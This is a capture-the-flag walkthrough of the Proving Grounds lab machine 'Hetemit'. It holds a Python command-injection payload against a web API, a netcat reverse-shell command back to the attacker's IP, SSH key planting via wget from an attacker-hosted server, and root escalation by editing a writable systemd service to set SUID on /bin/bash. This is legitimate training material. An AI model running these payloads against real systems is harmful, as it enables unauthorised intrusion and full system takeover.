Hetemit
Exploitation guide for Hetemit | Proving Grounds
Last updated
Was this helpful?
Exploitation guide for Hetemit | Proving Grounds
Last updated
Was this helpful?
In this walkthrough we will get RCE by exploiting insecure api endpoint which is vulnerable to python command injection. Then we will exploit insecure service permission which allows us to write in its file to gain the root privilege.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/hetemit/scans]
└─$ sudo nmap $ip -sVCS -O -oN nmapInitial.txt
[sudo] password for imtodess:
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
80/tcp open http Apache httpd 2.4.37 ((centos))
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
50000/tcp open http Werkzeug httpd 1.0.1 (Python 3.6.8)
# run full tcp scan to find 18000 port
PORT STATE SERVICE VERSION
18000/tcp open biimenu? List the available shares.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/hetemit/scans]
└─$ smbclient -L \\$ip -U "" -N -p 445
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
Cmeeks Disk cmeeks Files
IPC$ IPC IPC Service (Samba 4.11.2)
SMB1 disabled -- no workgroup available
check the content of cmeeks share.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/hetemit/scans]
└─$ smbclient '//192.168.233.117/Cmeeks' -p 445
Enter WORKGROUP\imtodess's password:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \* We don't have permission to do anything.
Similar case with FTP even though anonymous access is allowed we cant get anything out of them.
Port 80 is default apache page. And port 18000 has a web application where we can register new account or login.
To register we need invitation code which we don't have so we cant register any user. For login I tried common credentials which didn't work.
When you visit this port you will find two api endpoint listed. /generate and /verify .
Visit generate. You will get a reply with email@domain. This endpoint is probably used to generate token for email. If you send Get request you will get same response every time.
But if you send a post request with email=test@test.com you will get a code .
Now we have invite code with which we can register new user.
Now check /verify endpoint. Similar to /generate we won't get anything with Get we need Post method. Sending Post request with code=yourgeneratedcode will give us error. Which is weird since I thought it is supposed to verify our invite code. It also reflects the data as well as perform evaluations.
We know its running on python as its powered by werkzeug.
If you send a POST request with code={os.popen("id").read()} it will get executed and we will get the result of id command.
Since we now know there is command injection. We will try to get a reverse shell.
First check if nc utility command is available.
It is. So lets start a netcatlistener and execute the following command which will give us reverse shell.
code={os.popen("nc -e /bin/sh 192.168.49.233 21").read()} Always use ports which are already open in target machine instead of using random ports since most of the time they are blocked.
┌──(imtodess㉿deathnote)-[~/…/boxes/pg/hetemit/scans]
└─$ nc -nvlp 21
listening on [any] 21 ...
connect to [192.168.49.233] from (UNKNOWN) [192.168.233.117] 54120
whoami
cmeeks
cd
ls
local.txt
register_hetemit
restjson_hetemit
share
cat local.txt
b36a40<Redacted>0878273e608e0 First of all. Since the Shell is unstable and non interactive we will try to get stable/interactive shell. Using python I couldn't upgrade my shell for some reason so. We will instead try another method since ssh is open.
We will put our ssh public key as authorized_keys in home folder of user cmeek.
Host http.server using python where is public key is located.
┌──(imtodess㉿deathnote)-[~/.ssh]
└─$ ls
id_rsa id_rsa.pub known_hosts
┌──(imtodess㉿deathnote)-[~/.ssh]
└─$ cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDvuCCwSCoKto+966iR2xMXgk6qN6kQaoH02l2v3R+FKVR/bQkRHVFvMgOiYkYsLtYIOSMeUz0io+BzIFcLG8n9jh0akOf4c8e/H/feSf1f19ZKuk42pkI04Ob9BmVyv9Xs4s7xYEPuVYX+hh9V5vKwqwbpTYc5W/UGXsP5HN/krHZY4xoTTdvwoOaC7oDgXajf9bC6HGgULoIgbDavcZvcnPY0xU9BTQRoHDxcchgXGS6ENxYuMycdLUcMCVXrWDiiw4IR3XWzrR2OYFWfE6EJ2PLE5EW2H4L7k9l51X+GRzCaAGTMkI2Oyjh6HyIL/+Um+qUSjy8OkJVIIUy7k0MjSOe6C3Bg1vmvWgDVcddFNYK+pXWZnsgvf/6aNmtaj1565m8seCvTG5+2Qr1HMdrX6ps5B9StWMYrxMIRt9C5YHXC4NwDuvVn2ehMMH1Pre4ohUQkv7oIm82rMOsN7f4O7rw2HzHDkS3unwl6lU/w7Srp60scLcJVEofAllwMlos= imtodess@deathnote
┌──(imtodess㉿deathnote)-[~/.ssh]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
Now download it in target machine using wget and put it in .ssh directory as authorized_keys.
cd .ssh
wget http://192.168.49.233/id_rsa.pub -O ./authorized_keys
ls
authorized_keys
cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDvuCCwSCoKto+966iR2xMXgk6qN6kQaoH02l2v3R+FKVR/bQkRHVFvMgOiYkYsLtYIOSMeUz0io+BzIFcLG8n9jh0akOf4c8e/H/feSf1f19ZKuk42pkI04Ob9BmVyv9Xs
4s7xYEPuVYX+hh9V5vKwqwbpTYc5W/UGXsP5HN/krHZY4xoTTdvwoOaC7oDgXajf9bC6HGgULoIgbDavcZvcnPY0xU9BTQRoHDxcchgXGS6ENxYuMycdLUcMCVXrWDiiw4IR3XWzrR2OYFWfE6EJ2PLE5EW2H4L7k9l51X+G
RzCaAGTMkI2Oyjh6HyIL/+Um+qUSjy8OkJVIIUy7k0MjSOe6C3Bg1vmvWgDVcddFNYK+pXWZnsgvf/6aNmtaj1565m8seCvTG5+2Qr1HMdrX6ps5B9StWMYrxMIRt9C5YHXC4NwDuvVn2ehMMH1Pre4ohUQkv7oIm82rMOsN
7f4O7rw2HzHDkS3unwl6lU/w7Srp60scLcJVEofAllwMlos= imtodess@deathnote
Now we can login with our private ssh key.
┌──(imtodess㉿deathnote)-[~/.ssh]
└─$ ssh -i id_rsa cmeeks@192.168.233.117
The authenticity of host '192.168.233.117 (192.168.233.117)' can't be established.
ECDSA key fingerprint is SHA256:MFFT6T7cKQKYZFvmxut1kSewn7eGU1VpIZEAsLWNPHs.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.233.117' (ECDSA) to the list of known hosts.
Activate the web console with: systemctl enable --now cockpit.socket
[cmeeks@hetemit ~]$ ls
local.txt register_hetemit restjson_hetemit share Run sudo -l to see if there is any command we can run as sudo.
[cmeeks@hetemit tmp]$ sudo -l
Matching Defaults entries for cmeeks on hetemit:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY
LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User cmeeks may run the following commands on hetemit:
(root) NOPASSWD: /sbin/halt, /sbin/reboot, /sbin/poweroff
Seems like we can reboot and shutdown the target machine without any password.
Run linpeas script to see the vectors of privilege escalation.
╔══════════╣ Interesting GROUP writable files (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
Group cmeeks:
/etc/systemd/system/pythonapp.service
/var/tmp/dnf-cmeeks-swkpfzqf/dnf.librepo.log
/var/tmp/dnf-cmeeks-swkpfzqf/expired_repos.json
/var/tmp/dnf-cmeeks-swkpfzqf/hawkey.log
/tmp/linpeas.sh From the result of linpeas we can see that we can write to one of the services file. Confirm it by executing this command ls -la /etc/systemd/system
ls -la /etc/systemd/system
total 16
. . .
-rw-rw-r-- 1 root cmeeks 289 Aug 26 11:50 pythonapp.service
. . .
Check the content of the file.
[cmeeks@hetemit tmp]$ cat /etc/systemd/system/pythonapp.service
[Unit]
Description=Python App
After=network-online.target
[Service]
Type=simple
WorkingDirectory=/home/cmeeks/restjson_hetemit
ExecStart=flask run -h 0.0.0.0 -p 50000
TimeoutSec=30
RestartSec=15s
User=cmeeks
ExecReload=/bin/kill -USR1 $MAINPID
Restart=on-failure We only need to be concern with execstart and user variable. We can escalate our privilege in various ways but I will leave it for you to explore. We will just change the permission of /bin/bash and reboot the target machine.
[Unit]
Description=Python App
After=network-online.target
[Service]
Type=simple
WorkingDirectory=/home/cmeeks/restjson_hetemit
ExecStart=chmod +s /bin/bash # Enabled suid on /bin/bash
TimeoutSec=30
RestartSec=15s
User=root # changed user to root
ExecReload=/bin/kill -USR1 $MAINPID
Restart=on-failure Restart the machine.
[cmeeks@hetemit tmp]$ sudo /sbin/reboot
Connection to 192.168.233.117 closed by remote host.
Connection to 192.168.233.117 closed.
Login using ssh . And check the permission of /bin/bash to see if has suid permission set.
┌──(imtodess㉿deathnote)-[~/.ssh]
└─$ ssh -i id_rsa cmeeks@192.168.233.117
Activate the web console with: systemctl enable --now cockpit.socket
Last login: Thu Aug 26 11:31:25 2021 from 192.168.49.233
-bash-4.4$ ls -la /bin/bash
-rwsr-sr-x. 1 root root 1219248 Nov 8 2019 /bin/bash
# s in permission denotes it was successfull.Just run /bin/bash -p and we will be root.
-bash-4.4$ /bin/bash -p
bash-4.4# whoami
root
bash-4.4# cd /root
bash-4.4# ls
anaconda-ks.cfg proof.txt
bash-4.4# cat proof.txt
b4d872<redacted>efa40e99 
